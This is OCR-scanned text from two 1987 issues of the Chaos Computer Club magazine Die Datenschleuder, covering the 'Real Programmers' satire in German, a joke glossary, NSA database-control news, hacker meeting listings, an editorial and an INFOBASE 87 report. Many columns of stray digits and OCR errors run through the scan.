IF-Statements, weil sie den Code interessanter 
machen; 

-Richtige Programmierer schreiben selbstmo¬ 
difizierenden Code, speziell wenn sich dadurch 
20 Nanosekunden im Inneren einer engen 
Schleife einsparen lassen; 

-Richtige Programmierer brauchen keine Kom¬ 
mentierungen: Der Code spricht für sich; 

-Daß FORTRAN keine strukturierten IF, RE- 
PEAT...UNTIL oder CASE- 
Statements kennt, braucht einen Richtigen Pro¬ 
grammierer nicht zu sorgen. Nebenbei, man 
kann sie nötigenfalls simulieren durch zuge¬ 
wiesene GOTO’s. 

‘'Datenstrukturen“ gehen seit kurzer Zeit auch 
durch die Presse. Abstrakte Datentypen. Struk¬ 
turen, Pointer, Listen und Strings sind in be¬ 
stimmten Kreisen populär geworden. Wirth, der 
Müslifresser, hat ein ganzes Buch geschrieben 
('Algorithms + Data Structures = Programms', 
Prentice Hall, 1976), das behauptet, man könne 
Programme basierend aut “Datenstrukturen'' 
schreiben, anstatt die anderen Wege zu be¬ 
nutzen. Wie jeder Richtige Programmierer 
weiß, ist der einzige nützliche Datentyp der 
Array. Strings, Listen, Strukturen und Mengen 
sind alles spezielle Fälle von Arrays und können 
als solche behandelt werden, ohne einem die 
Programmiersprache zu komplizieren. Das 
Schrecklichste an den wunderlichen Datenty¬ 
pen ist, daß man sie deklarieren muß; Richtigen 
Programmiersprachen implizit ist - wie wir alle 
wissen - eine Schreibweise, die aut dem ersten 
Buchstaben des sechs Zeichen langen Varia¬ 
blennamens basiert. 

Was für eine Art Betriebssystem verwendet ein 
Richtiger Programmierer? CP/M? Gott behüte. 
Im Grunde ist das ein Spielzeug-Betriebssys¬ 
tem. Auch kleine ältere Damen und Ober¬ 
schüler können CP/M benutzen und verstehen. 

Unix ist selbstverständlich ein wenig kompli¬ 
zierter - der typische Unix-Hacker wei ß nie, wie 
der PRINT-Befehl diese Woche heißt - aber 
wenn’s um die Wurst geht, ist Unix ein herrli¬ 
ches Videospiel. Die Leute machen nichts se¬ 
riöses aut Unix-Systemen: sie schicken 
Scherzchen via USENET um die Erde oder 
schreiben Adventure Games und For¬ 
schungsberichte. 



Nein, der Richtige Programmierer verwendet 
OS/370. Ein guter Programmierer kann die Be¬ 
schreibung eines lJK305l-error, der grade auf¬ 
getreten ist, in seinem JLC-Handbuch finden 
und verstehen. Der großartige Programmierer 
kann JCL schreiben ohne einen Blick ins Hand¬ 
buch zu werfen. Ein wirklich außergewöhnli¬ 
cher Programmierer kann Bugs finden, die in 
sechs Megabyte Core Dump vergraben sind, 
ohne auch nur einen Hex- 
Taschenrechner zu benutzen. 

OS/370 ist ein wahrhaft bemerkenswertes Be¬ 
triebssystem. Es ermöglicht die Vernichtung 
der Arbeit von einigen Tagen durch einen ein¬ 
zigen falsch gesetzten Blank, also ist es beim 
Programmieren angesagt, aufgeweckt zu sein. 
Die beste Art, an das System ranzugehen, ist 
über eine Lochkartenstanze. Einige Leute be¬ 
haupten, es gäbe ein Timesharing System, das 
auf OS/370 läuft, aber nach sorgfältigen Stu¬ 
dien bin ich zu der Ansicht gelangt, daß sie 
unrecht haben. 

Was für Tools benutzt der Richtige Program¬ 
mierer? Theoretisch kann ein Richtiger Pro¬ 
grammierer seine Programme zum Laufen brin¬ 
gen, indem er sie direkt über die Schalttafel in 
den Computer eingibt. In den frühen Tagen, als 
die Computer noch Schalttafeln hatten, wurde 
das gelegentlich so gemacht. Der typische 
Richtige Programmierer hat den gesamten 
Bootstrap Loader in Hex im Gedächtnis und gibt 
ihn neu ein, wenn er von seinem Programm 
zerstört worden ist. In dieser Zeit war Speicher 
noch Speicher - er verschwand nicht, wenn der 
Strom weg war. Heutzutage vergißt der Spei¬ 
cher Dinge, auch wenn du es nicht willst, oder 
er behält Dinge, die er längst hätte vergessen 
sollen. 

Die Legende sagt, daß Seymour Cray, der 
Erfinder des Cray I Supercomputers und der 
meisten Control-Data-Computer, das erste Be¬ 
triebssystem für die CDC 7600 aus dem Ge¬ 
dächtnis über die Schalttafel eingab, als sie 
zum ersten Mal hochgefahren wurde. Cray ist 
selbstverständlich ein Richtiger Programmie¬ 
rer. 

Einer meiner Lieblings-Richtige-Program- 
mierer war Systemprogrammierer bei Texas 
Instruments. Eines Tages erreichte ihn ein 
Ferngespräch von einem User, dessen System 
mitten in einer wichtigen Arbeit zusammenge¬ 
brochen war. Jim behob den Schaden über das 
Telefon, indem erden User dazu brachte, Disk 
I/O-Instruktionen über die Schalttafel einzuge¬ 
ben, nach seinen Anweisungen System Tables 
in Hex zu reparieren und Registerinhalte aus¬ 


zulesen. Die Moral dieser Geschichte: Obwohl 
ein Richtiger Programmierer nützlicherweise 
eine Lochkartenstanze und einen Printer zu 
seinem Werkzeug zählt, kann er im Notfall mit 
einer Schalttafel und einem Telefon auskom- 
men. 


^POST 

Tomteboda prk 2 

42 

GÖTEBORG BAN 
trans 




ln einigen Firmen besteht das Edieren von 
Programmtext nicht länger darin, daß zehn In¬ 
genieure Schlange stehen, um eine 029- 
Lochkartenstanze zu benutzen. Tatsächli'ch ist 
es so, daß in dem Gebäude, in dem ich arbeite, 
keine einzige Lochkartenstanze steht. Oer 
Richtige Programmierer hat in dieser Situation 
seine Arbeit mit einem Text Editor-Programm 
zu machen. Die meisten Systeme sind mit ver¬ 
schiedenen Editoren ausgestattet, aus denen 
man wählen kann, und der Richtige Program¬ 
mierer muß achtgeben, daß er sich den aus¬ 
sucht. der seinem persönlichen Stil entspricht. 
Viele Leute glauben, daß die besten Editoren 
der Welt im Xerox Palo Alto Research Center, 
zur Verwendung auf Altos- und Dorado- 
Computern geschrieben werden. Unglückli¬ 
cherweise wird kein Richtiger Programmierer 
jemals einen Computer mit einem Betriebssy¬ 
stem benutzen, das SmallTalk heißt, und er 
wird dem Computer bestimmt keine Mitteilun¬ 
gen mit einer Maus machen. 



63990 

57171 

15370 

99635 

77735 

90371 

96205 

06114 

65148 

37526 

20956 

5:;-U7 

13290 

02599 

43976 

63114 

54590 

;'i35S 

98979 

1 15 8.3 

70934 

19370 

44115 

51:19 

20117 

] 6 4 58 

05669 

45933 

13113 


6jö2ß 

62734 

63184 

90346 

29395 

00294 

53341 

16432 

41149 

69753 

32681 

13087 

31699 

4 2.739 

35869 

66295 

71241 

02732 

3?i:.s 

74175 

492.28 

71362 

45454 

72228 

39552 

7.752? 

52402 

45 ? 0.3 

80.574 

15026 

92246 

3862S 

5.1265 

42211 

81572 

1|1 

62239 

11205 

21464 

39085 

10009 




Einge der Konzepte dieser Xerox Editoren sind 
in Editoren aufgenommen worden, die auf Be¬ 
triebssystemen mit etwas vernünftigeren Be¬ 
zeichnungen wie etwa EMACS oder VI laufen. 
Das Problem mit diesen Editoren ist, daß Rich¬ 
tige Programmierer meinen, ’what you see is 
what you gef sei ein schlechtes Konzept für 
Text Editoren. Der Richtige Programmierer will 
einen ’you asked for it, you got if-Editor; einen, 
der kompliziert, kryptisch, mächtig, unnach¬ 
sichtig und gefährlich ist. TECO, um genau zu 
sein. 

Man hat festgestellt, daß eine TECO- 
Kommandofolge eher an Zeichensalat durch 
Übertragungsrauschen erinnert als an lesbaren 
Text. Eines der unterhaltsamsten Spiele mit 
TECO besteht darin, daß man seinen Namen 
als Kommandozeile eintippt und Vermutungen 
darüber anstellt, was dadurch passiert. So gut 
wie jeder mögliche Tippfehler bei der Kommu¬ 
nikation mit TECO wird kurzerhand dein Pro¬ 
gramm zerstören, oder schlimmer noch, subtile 
und mysteriöse Bugs in Subroutinen schleu¬ 
sen, die einst funktioniert haben. 

Aus diesem Grund widerstrebt es Richtigen 
Programmierern, ein Programm zu edieren, 
das kurz davor steht, zu funktionieren. Sie fin¬ 
den es viel einfacher, den binären Objektcode 
direkt zu patchen, indem sie ein wunderbares 
Programm benut 2 er;i, das SUPERZAP (oder 
das entsprechende Äquivalent auf nicht-IBM- 
Maschinen) heißt. Das funktioniert so gut, daß 
viele Programme, die auf IBM-Systemen lau¬ 
fen, keinerlei Verwandtschaft mehr mit dem 
original FORTRAN-Code haben. In einer An¬ 
zahl von Fällen ist der Source Code nicht länger 
verfügbar. Wenn es an der Zeit ist, ein derar¬ 
tiges Programm zu fixieren, wird kein Manager 
jemand geringeren als einen Richtigen Pro¬ 
grammierer mit dem Job betrauen - kein müs¬ 
lifressender strukturierter Programmierer wür¬ 
de wissen wo anfangen. Das nennt man Ar¬ 
beitsplatzsicherung. 

Einige Programmier-Tools, die nicht von Rich¬ 
tigen Programmierern benutzt werden: 

-FORTRAN-Präprozessoren wie MORTRAN 
und RATFOR. Derartige Programmierrezepte 
sind gut zum Müslimachen; 

-Source Language Debugger. Richtige Pro¬ 
grammierer können Core Dumps lesen; 
-Compiler mit Array Bounds Checking. Sie er¬ 
sticken die Kreativität, vernichten die meisten 
der interessanten Ver 

wendungsweisen für EOUIVALENCE und ma¬ 
chen es unmöglich, den Befriebssystemcode 

cl&Cewber 


mit negativen Vorzeichen zu modifizieren. Das 
Schlimmste: Bounds Checking ist ineffizient. 
-Source Code-Pflegesysteme. Ein Richtiger 
Programmierer hält seinen Code in einem Kar¬ 
teikasten verschlossen, denn er geht davon 
aus, daß der Eigentümer seine wichtigen Pro¬ 
gramme nicht unbewacht zurücklassen kann. > 


20247 

1939 1 

7 1055 

53901 

139 43 

31663 

15153 

2 n 9 4 .V 

6 S 7 6 0 

69611 

02505 

17100 

73927 

63335 

j 5 j -j 8 

62725 

5353B 

83096 

367 KS 

44662 

37092 

26469 

09671 

25406 

l 9 ö T 5 

02 143 

1762 1 

16631 

40097 

59523 

1 4939 

07222 

00111 

2681 1 

53103 

38731 

.'6173 

23235 

26 360 

53381 

73151 

03459 

57365 

33223 

53499 

29353 

22G36 

85100 

73138 

34 63 4 

34999 

35184 

04451 

70427 

01393 

91994 

24341 

00905 

75376 

25776 

757 1 1 

1 3090 

033 16 

41833 

19201 

96262 

34162 

88166 

52137 

4 717.; 

25477 

72773 

34337 

7 4 366 

51382 

87521 

56635 

71950 

6 3 71 9 

36565 

39 033 

9 4 493 

6642 1 

76400 


Die Ratenschleuder 

Ultravollständiges 
maximegaionischstes 
Wörterbuch aller Zeiten 

(zweite Rate) 

BASF: 

Byte-Abweisende SchutzFolie. 

BIMoMAT: 

BürolndustrialisierungsMaschine ohne 
MAThecoprozessor. 

mSdOS-tähiger Kleinrechner vom Typ FOX- 
trottel. 

FOXTrottel: 

FernOst-XT. BIMoMAT ab 2/3-kompatibel. 
FOXtrottel de Luxe: 

Leistungsfähiger Trottel bis zur 80986-Klasse. 
GIPS: 

Gigalnstruktionen Pro Sekunde. 1000 MIPS = 
1 GIPS. 

GRIPS: 

Nachweislich undefinierbare Maßeinheit. 
LOGOMAT: 

LOGischer AutoMAT. Neudeutsches Kunst¬ 
wort für Computer. 

mSdOS; 

meinem System droht Overkill Status. 

Betriebskrankheit gefährdeter Seelen. 












IMPRESSUM 


Die Datenschleuder Numero 20 
Das wissenschaftliche Fachblatt für Datenrei¬ 
sende 

D-2000 Hamburg 20 
Schwenckestrasse 85 

Geonet: Geo1;Chaos-Team 
Btx ; 655321 

Herausgeber und ViSdPG; Herwart Holland- 
Moritz 


Mitarbeiter (u.a.); 

R. Schrutzki, S. Wernery, A. Eichler, 

P. Franck, H. Gruel, M. Kuehn, Esco, Andy 
M.-M., S. Stahl, padeluun, KS, jwi, Dietmar 
Wintschnig, Poetronic 


Vierfarb-Termindruck im Selbstverlag. 
April 1987 


.31215 

27870 

22236 

64636 

o o 7,, 5 

50356 

55769 

43336 

54950 

02708 

53923 

61710 

55021 

31147 

41374 

41061 

34445 

544 19 

21013 

36172 

99623 

56948 

99193 

36918 

47294 

73580 

72915 

60335 

10396 

70195 

94290 

3 318 & 

49075 

60336 

79S51 

49663 

i44a9 

Afi5.9? 

94013 

78517 

04038 

77337 


Mega-Control 


US-Behörde will alle öffentlichen Datenbanken kon¬ 
trollieren und zensieren 



ln der US-Zeitschrift "Chronical of Higher Educa- 
tion" wurde 21. Januar berichtet, daß der President 
der USA eine Direktive (National Security Directive 
145) erlassen hat, mit der die Nationale Sicherheits¬ 
behörde NSA die Befugnis erteilt wird, öffentlich zu¬ 
gängliche Datenbanken zu kontrollieren und zu zen¬ 
sieren, ohne vorher die Zustimmung des jeweiligen 
Autors eines Datenbankdokumentseinholenzu müs¬ 
sen. Datenbanken sind elektronische Informations¬ 
systeme, die für spezielle Themen oder Winschafts- 
branchen Dokumente und Literaturverzeichnisse per 
Computer zur Verfügung stellen. 

Die Autorin des Artikels, Judith Axier Turner, weist 
daraufhin, daß die US-Regierung ein neues Büro der 
NSA eingerichtet hat, das für die Sicherheit ALLER 
Computersysteme zuständig sein wird, "die empfind¬ 
liche Informationen speichern könnten - unabhängig 
davon, ob sie von Regierungsbehörden gespeichert 
werden, der Geheimhaltungspflicht unterliegen oder 
der nationalen Sicherheit unmittelbar berühren”. 
Dies schliesst auch solche kommerzielle Systeme mit 
ein wie Dialog, Nexis, Lexist, u.a. 

Frau Turner zitiert, unter anderen, Frau Diane Foun- 
taine, Leiterin der Abteilung Informationssysteme im 
Büro des stellvertretenden Verteidigungssekretär, die 
für Kommunikation, Kommandoslruktur, Kontrolle 
und Nachrichtendienste zuständig ist: "Die Frage in 
den 80er Jahren ist nicht: "Wird es Einschränkungen 
oder. Kontrolle bei der Benutzung kommerziell zu¬ 
gänglicher Datenbanken sein"; die Frage ist viel¬ 
mehr: "Wie werden solche Einschränkungen und 
Kontrollen angewandt?”. 


Robert L. Park der "American Physical Society" be¬ 
merkte; "Behörden, die darauf (die Direktive, Anm. 
d. Red.) zurückgreifen wollen, werden sie auf alles 
anwenden, das sie verbergen wollen", darunter auch 
Forschungsberichte. Park wies außerdem daraufhin, 
daß jeder Bericht, der von einer Behörde finanziert 
wird, somit als "empfindlich" eingestuft und unter 
Kontrolle gestellt werden kann. 

Diese Entwicklung ist sicherlich auch vor dem Hin¬ 
tergrund des zunehmenden Einsatzes von Telekom¬ 
munikation durch "radikale" Bewegungen in den 
USA zu.sehen. Seinerzeit wurden die bundesweiten 
Protestaktionen gegen die Investitionen amerikani¬ 
scher Universitäten auch mit der Hilfe eines elektro¬ 
nischen Konferenzsysiems koordiniert. 

Die NSA ist in letzter Zeit mehrfalls aufgefallen. Die 
Bayerische Hackerpost hatte am 14.12.86 von einem 
Artikel in der EG- Zeitschrift "Information Market" 
berichtet, demzufolge vertrauliche Informationen eu¬ 
ropäischer Firmen an konkurrierende US-Firmen 
von Überwachungszentren der US-Streitkräfte wei¬ 
tergeleitet werden. Der Verfasser, ein früherer Mitar¬ 
beiter der US-Luftwaffe, behauptet, daß dieser Teil 
der Überwachung der Telekommunikations bei wei¬ 
tem das Abhören des sowjetischen Militärfunkver¬ 
kehrs überwiege. 

"Die wichtigste Station für die gegenseitige Sicher¬ 
heit in der Welt”, so ein früherer Direktor der US Na¬ 
tional Security Agency NSA, liege in Menwith Hill in 
der Grafschaft Yorkshire im Norden Englands. Dort 
laufen einige 10.000 Telefonleitungen zu der nahege¬ 
legenen Relaisstation der britischen Telefongesel- 
schaft British Telecom. Menwith Hill werde außer¬ 
dem durch einen Hohlleiter versorgt, der bereits vor 
seiner Modernisierung vor zwei Jahren eine Kapazi¬ 
tät von 32.000 Telefongesprächen gleichzeitig hatte. 
Die NSA ist auch für die Überwachung sämtlicher in¬ 
ternationale US Telefon- und Datenteilungen, auch 
mittels computerunterstützter Stichprobenprüfung, 
zuständig. Übersetzung: TT 

BEREICH COMPOST USA 


Ö2470 

51945 

05041 

98477 

42014 

133?4 

77312 

02315 

38684 

57372 

90544 

05751 

06012 

95258 

05659 

47030 

46336 

34459 

26525 

52137 

00806 

87520 

09593 

4 5360 

73U2 

261 18 

7231 7 

39230 

74623 

09463 

53673 

23106 

09792 

1599.3 

60019 

94623 

79S34 

34210 

65731 

34973 

46959 

24646 

97525 

06246 

95861 

69091 

78573 

97659 

51993 

92993 

995S6 

75427 

1 4654 

91045 

68607 

02099 

01260 

63187 

04934 

17807 

91739 

24071 

94599 

63230 

60254 

70790 

17745 

27513 

18630 

99822 

34730 

36076 

65368 

66355 

51646 

77029 

1 1336 

82756 

31072 

i o 3 4 6 

7261 1 

37054 

90795 

36533 

45386 

37196 

23585 

63126 

19337 

15677 

41 ■ S7 

■33527 

72292 

25947 

4 3373 

73569 

55334 

56246 

30101 

39057 

2787; 

01d51 

29666 

■36764 

45137 

24656 

53730 

40244 

3694 1 

40314 

4337: 

29578 

4 7348 

49000 

30194 

77388 

02046 

0.7:4ö 

60342 

87535 

18433 

64959 

1 9508 

2b'o83 

23206 

5221 2 

31041 

90443 

04724 

79492 

91342 

28495 

19700 

22601 

31043 

00624 

10717 

9 7150 

279.’4 

-3 3 J 6 3 

40799 

59605 

31446 

05..*2-. 

04885 

23972 

91765 

V c) 7 6 fl 

1 066 7 

31193 

7932 3 

72457. 

35720 

96075 

82277 

17843 


SDie S>aten^c^reuber 



^Datcn^cl^Ceubcr 




336 16 

13592 

61289 

62261 

18129 

45592 

74627 

ä7137 

79448 

75867 

53657 

54496 

1 4076 

11931 

12595 

85126 

557 59 

73457 

30153 

33642 

63076 

79354 

43385 

76171 

53334 

62325 

27057 

20053 

03988 

23949 

90342 

5956 6 

23297 

57924 

88735 

02925 

91668 

25994 

45699 

46559 

92658 

45476 

26945 

23730 

51650 

1 7206 

74785 

41788 

79822 

76906 

53665 

064 1 9 

10973 

43452 

B87B3 

35621 

72615 

62695 

82654 

47820 

56729 

97756 

42632 

53215 

94294 

41803 

99452 

17000 

09054 

26507 

63095 

58846 

59951 

71709 

14760 

74371 

36893 

31946 

90909 

91904 

50129 

03070 

99566 

22662 

03031 

82649 

36573 

36984 

19555 

77696 

37376 

24910 

35286 

56866 

07600 

56602 

56054 

4571 1 

33728 

68402 

05574 

41603 

08370 

52312 

24258 

72234 

38354 

12317 

94813 

88550 

07568 

9331 1 

24935 

33631 

B6352 

87033 

79934 

56926 

19931 

79452 

-33640 

87429 

59113 

07474 

534 1 9 

55142 

03517 

26194 

20034 

55091 

70345 

6823b 

82003 

97739 

45584 

26792 

14273 

47756 

00796 

44279 

20270 

83121 

50156 

40634 

13416 

17166 

44306 

9B154 

83764 

47157 

39001 

21217 

04154 

79725 

91993 

94332 

53649 

50514 

771,37 

93991 

47205 

21952 

70793 

96137 

62110 

72384 

94290 

61635 

76045 

96231 

25350 

60685 

37651 

4 2 3 1 1 

53496 

65683 

71511 

66042 

20796 

39446 

6621 1 

63255 

15772 

90709 

7847.3 

1 5627 

82775 

98783 

13649 

19512 

5 7433 

32S79 

3771 5 

71459 

09106 

484 16 

42678 

-33994 

972-36 

74420 

17586 

2:694 

021 5'^ 

40792 

44805- 

41255 

36043 

13179 

92696 

739 15 

75424 

19296 

6073 1 

23937 

63542 

1 3 9 23 

06173 

76753 

9587 1 

1 4361 

04089 

40996 

60894 

71413 

34069 

8 3629 

93675 

3 62 62 

15452 

47293 

4642 1 

37528 

91079 

38438 


1 3060 95552 63272 08375 1 3629 3:.?06 

67372 21430 1957? 37937 3607; 10725 

42772 8907 1 73235 43743 74 355 73r^6 

65117 16618 33088 1129! 20245 20404 


86822 

00072 

3440-3 

S0254 

43:0; 

3.34:5 

41373 

84653 

80259 

I50t4 

4527 1 

05770 

00445 

21097 

/-3558 

59976 

2 2 0 55 

43494 

16217 

1 4939 

53239 

34216 

03114 

06:95 

07184 

90427 

79925 

85527 

43035 

2i 39 

63356 

79013 

07640 

60421 

39337 

3387:' 

44601 

70942 

609:7 

2:011 

7:133 

134266 


43336 51780 00217 19034 49234 26426 

629:2 61456 00433 73938 69335 55534 

34530 04264 81347 39892 15627 08609 

56506 29340 40526 49432 44261 44566 

59212 91225 64809 35696 55009 15430 

64261 34252 66847 25949 14314 23939 

88454 32486 32/46 18420 46655 98533 

23122 10466 2593? 01417 12103 44603 

42716 i6o!9 00125 71058 70793 21756 

96985 44013 39762 20967 49454 18548 

71184 46433 94699 01626 98351 60734 

39245 1 4053 94004 6.395; (,7337 3545; 

97003 07051 lö363 25194 37701 13976 

40023 27648 41416 05372 06184 13529 

71391 54019 63825 32393 091 49 663:.4 

57535 71427 31349 20163 94644 33249 

90373 86069 00807 27093 27673 12758 

19665 63941 14B96 17163 32930 45513 

97295 0663’ 60474 09154 20423 42999 

35410 25329 1 1 350 224 16 O07(,9 43.I66 

35742 42522 53902 69390 34314 35645 

i:.O30 69925 19959 043o3 04020 42926 

74125 73422 44776 55841 -738ö 17173 

72654 62035 49S:? 4493? 4673' 3509; 

95316 52632 07225 RO?2:. 63963 45’öl 

2a;30 33006 56’33 31122 89305 30914 

05’26 10365 33434 53731 01653 15116 

753:2 :7o74 33'0! 4329! 6'4:9 20151 

2550 ' 3257; 'O'IO 4;6i4 

9324 1 46'8a 4’.’'2 50 ’6 84260 6:.3?3 

52'35 4293 0 ;3.:'3 "'i:?: if;:.3g -;i’c 

42003 043,68 /o'.'.o 2i35o' 41 ö3I 00-33: 


2 3/0; 14433 1 ’6 0 0 M 6 6 3 4:0 3 5372 1 
:3o4: ol’OJ' 31400 ;;5C- ;;;g3 ,3-^7 
2 3 3 - Ik ‘j 7 ly 1 •'5 i; f- ■ w 1 •' i r>. C r ^ ~ 31; Z- 



&er IDatenScl^leuber 


DM 3,00 


Numero 21 - Juni 1987 


Postvertnebsstuck 

C9927F 






Hacker-Meetings - Wichtige Termine 


inoJ>i 

m 



h 

Mo 


28.08. - 30.08. Sysoptreffen in Berlin 
Der IPN, CCC und CAC laden zum Treffen 
der Mailboxbetreiber. Veranstaltungsort ist 
der Mehringhof in Berlin. Anmeldung bei: IPN, 
H.Nopper, Brusendorfer Sti. 20,1 Berlin 44. 

28.08. - 14.09. Internationale Funkausstellung Ber¬ 
lin 

Die Konsumelektronik läßt Grüßen. 

Hackertreff Dienstag am Poststand um 16 Uhr. 


Tel; eh immer besetzt 

Btx: nö 

Mbx; 

Treffen: Montag 20 Uhr im Kaffe Hardenberg, 
Hardenbergstr. 10, Berlin 12, nähe Zoo. 

CCC-Rhein-Main (DS-RED Rhein-Main) 

C/o E.Engelter 
Postfach 1201 
D-6073 Egelsbach 
Tel: 06103 4274 
Btx: nö 

Mbx: IFX2:E.EngeIter 

Treffen; nö 


12.09. - 13.09. CCC-Workshop in Hamburg 
Beginn der Testphase von BTXNET. Mailboxbe¬ 
treiber beginnen mit Testbetrieb 
eines eigenen Netzes. Ort: Eidelstedter 
Bürgerhaus. Auf Einladung. 

19.10. - 23.10. SYSTEMS in Müchnchen 
Hackenreff Dienstag am Poststand 16 Uhr. 

28.12. - 29.12. Chaos Communication Congress 
1987 - Hamburg 

Die europäische Hackerpany. Näheres im Oktober. 

Weitere Hinweise in den Btx-Programmen des CCC, 
CAC undderBHP. 

Erreichbar über *655322,,. 


[\ .^1 Bitia nicht 

J v«rg«st0n 

CCC 

Chaos Computer Club e.V. 

Schwenkestraße 85 

D-2000 Hamburg 20 

Tel: 040-4903757 (040-483752) 

Btx: *655321,, 

Mbx; Geol;Chaos-Tcam 
Clinch;Chaos-Team 

Treffen: Dienstags gegen 19 Uhr in der ÖILE 


CCC-Berlin (Ortsgruppe) 
c/o Vinyl Boogie 
GleditschstratJe 45 
D-1000 Berlin 30 


CAC 

Computer Anists Cologne e.V. 

Postfach 300308 
D-5000 Köln 30 

Tel; 0221-381418, 0221-5503749 
Btx: (17) *92016306,, 

Mbx: keine Meldung 

Treffen; Jeden 2. Samstag, 14-19UhrimJugendpaik 
unter der ZoobrUcke Sachsenbergstr. 

(Nicht in den Soramerferien). 


BHP 

Bayerische Hackerpost 
c/o BASIS 
Adalberisr. 41b 
D-8000 München 40 
Tel: 089-808447 
Btx; (32) *92049204,, 

Mbx: IFXl: BHP-RED 

Treffen: Jeden Donnerstag ab 19 Uhr in den 
Mathäser-Stuben (U-Bahn Messegelände oder S- 
Bahn Hackerbriieke) in der 3. Woche ist es ein 
Freitag! 

IPN 

Inter Pool Net e.V. (Verein von Mailboxbetreibem) 

c/o J.Schillte 

Veledastraße 2 

D-5000 Köln 1 

Tel: 0221-381418 

Btx: nö 

Mbx; 0221-387686 (38N1D) 

Treffen; Nächstes Treffen zur IFA in Berlin. 

Adressen und Treffen, soweit sie uns vorliegen. 
Keine Gewähr für die Angaben. 

Snlciidri|lciiucr 


Seite 2 


Numero 21 - Juni 1987 


Editorial 



Lieber D ATENS CHLEUDER-Leser, 

einige Dinge begreifen selbst wir recht spät. Andere 
begreifen wir, versäumen es aber, entsprechend zu 
handeln. Folgerichtig bleibtEtliches liegen und war¬ 
tet darauf, aufgearbeitet zu werden. Das sei hiermit 
getan. 

Die DATENSCHLEUDER erscheint nunmehr im 
dritten Jahr. 

Nach einerlängeren schöpferischen Pause im letzten 
Jahr haben wir es geschafft, wieder einigermassen 
regelmäßig herauszukommen. Das ist nicht zuletzt 
PeterGlaser zu verdanken, den wir trotz - oder wegen 
- seines Abstandes zum CCC im Zuge einer psy¬ 
chologischen Geiselnahme als Scheffredaktör ge¬ 
kapert haben. Mit Hilfe eines erlauchten Kreises von 
Zuarbeitem (huhu Didi !!) hat sich die DATEN¬ 
SCHLEUDER zu dem entwickelt, was jetzt in Eu¬ 
ren/Ihren Händen liegt. 

Teststop-Publishing war für die Redaktion noch nie 
ein Fremdwort, aber erst die Entwicklungen der 
jüngsten Zeit, unter anderem die zauberhaften 
Textkonvertierungs- und Filterprogramme von Vic, 
machen es uns erstmals in der Menschheitsge¬ 
schichte möglich, die Druckvorlagen in Eigenarbeit 
zu erstellen. Am gerüchteumrankten Prototypen für 
denchaotypischen Vierfarbkartoffeldruck wird wei¬ 
terhin rege gearbeitet. Schwierigkeiten bereitet der 
Druckertreiber und die Frage, ob auf gentechni¬ 
schem Weg eine Matrix-Kartoffel gezüchtet, oder 
besser ein Kartoffelgaslaser entwickelt werden soll. 

Der CCC ist seit mehr als einem Jahr ein eingetra¬ 
gener Verein. 

Zu seinen Aufgaben gehört laut Satzung auch die 
Herausgabe der DATENSCHLEUDER. Wir hatten 
es bisher beim alten Stand belassen und Wau als 

SntcnSdjIcubcr 



Herausgeber angefühn. Das hat sich mit dieser Aus¬ 
gabe auch geändert. Herausgeber ist nunmehr der 
Chaos Computer Club e.V. und Verantwortlich im 
Sinne des Pressegesetzes ist Reinhard Schrutzki. 
Das hat aber nur Bedeutung auf dem Papier und bei 
allfälligen Rechtstreitigkeilen. Die DATEN¬ 
SCHLEUDER ist und bleibt ein Produkt, das von 
einer Gruppe überwiegend gleichgesinnter (u nd 
gleichgestreßter) Menschen produziert wird. 

Daß hinter dem Projekt DATENSCHLEUDER auch 
Menschen stecken, hat so mancher Abonnent dop¬ 
pelt und dreifach zu spüren bekommen: so oft haben 
manche nämlich die jeweils aktuelle Ausgabe zu¬ 
geschickt erhalten. In der Aboverwaltung hat es 
Irrungen und Wirrungen gegeben. Es wird daran 
gearbeitet, sic zu beseitigen. Deshalb hier wieder die 
Bitte, Nachsicht zu üben, wenn mal wieder etwas 
nicht ganz wie vorgesehen klappt. Dazu siehe auch 
den Beitrag “Von Menschen und Mäusen“ ira vor¬ 
liegenden Heft. 

Nicht geklappt hat in der letzten Ausgabe die druck¬ 
technische Wiedergabe des Bestellfetzens. Offenbar 
war unsere Vorlage zu blass. Ergebnis war eine mit 
kryptischen leeren Feldern gemusterte Seite. Nur 
wenige Leser haben entsprechend reagiert und nach 
dem Moto “Raum für eigene Eintragungen“ Feh¬ 
lendes selbst ergänzt. 


Reinhard Schrutzki 


editor21.ds 198706032000 
goblin 


Numero 21 - Juni 1987 


Seite 3 





Die Quatsch-Explosion 


Bericht von der ONLINE-Tagung / 
INFOBASE 87 in Frankfurt 


- SO bezeichncte ein Vortragender auf der ONLINE-Tagung 
wahrend der Infobase 87 in Frankfurt die ungeheure Zunahme 
an Datenbanken und deren Qualiiät. Viele Daienbankanbieter 
begnügten sich einfach damit, Fachzeitschriften o.ä. abzu¬ 
schreiben. Diese werden dann schlicht hintereinanderweg ein- 
gespeist, einen Abstract und eine Süchwortzuordnung gibt es 
oft nicht. Sinnvoll, so der allgemeine Gmndtenor, sei aber die 
Volltextdalenbank nur in einigen wenigen Ausnahmen. Besser 
arbeiten Hesse sich mit Datenbanken, die einen Abstract böten 
und/oder auf die Quelle verwiesen. Allen Datenbanken ge¬ 
meinsam aber ist, dass sie durchschnittlich 12-24 Monate 
hinter der Aktualität h^hinken. 

Ausnahme ist da z.B. eine Datenbank, die die Urteile des 
höchsten US-am«ikanischen Gerichts beinhaltet. Hai der 
Richter sein Urteil gesprochen, wird ihm der Uncilstexl aus der 
Hand gerissen, jemand stürzt damit zum Schreibpool und das 
Urteil wird in die Datenbank eingefügt. So ist es möglich, daß 
dieseUrtßileschon wenigeStunden nach Verkündungabnifbar 
sind. 

Aids3omnot, VWWW und Zvei 

- von Grips, Stain bis CCL reicht das Spektrum bei Daten¬ 
banken. 

Das "Who iS Who - Jahrbuch zur tnfobase 8?", Adressbuch der 
ONLINEszene Uber Personen, Firmen, Datenbanken, deren 
Produzenten und Anbieter, verzeichnet Stichwörter zu etwa 
>.200 Datenbanken. 

1 (DM 29,50 zu beziehen bei: B.Team, B. Breidenstein GmbH, 
Untermainkai 83.6 Frankfun l) 


Das Angebot ist groß genug (so groß, daß es schon wieder 
Datenbanken über Datenbanken gibt). Fehlen nur noch die 
Benutzer. 

Als Hauptmängel der Datenbanken sind aufzuführen: 

- Die Organisaiionsstruklur (Indexierung) der Datenbanken. 
Sie ist oft so angelegt, daß man erst einmal nach nach dem 
richtigen Stichwort suchen muß, bevor man mit der eigentli¬ 
chen Recherche beginnen kann. 

- Mangel an Informationen. 

Datenbanken, die zu einem speziellen Gebiet nicht alle In¬ 
formationen, auch die aktuellen, enthalten, haben wenig Sinn. 
Die Retrieval*(Such)-Sprachen sind derart unterschiedlich, 
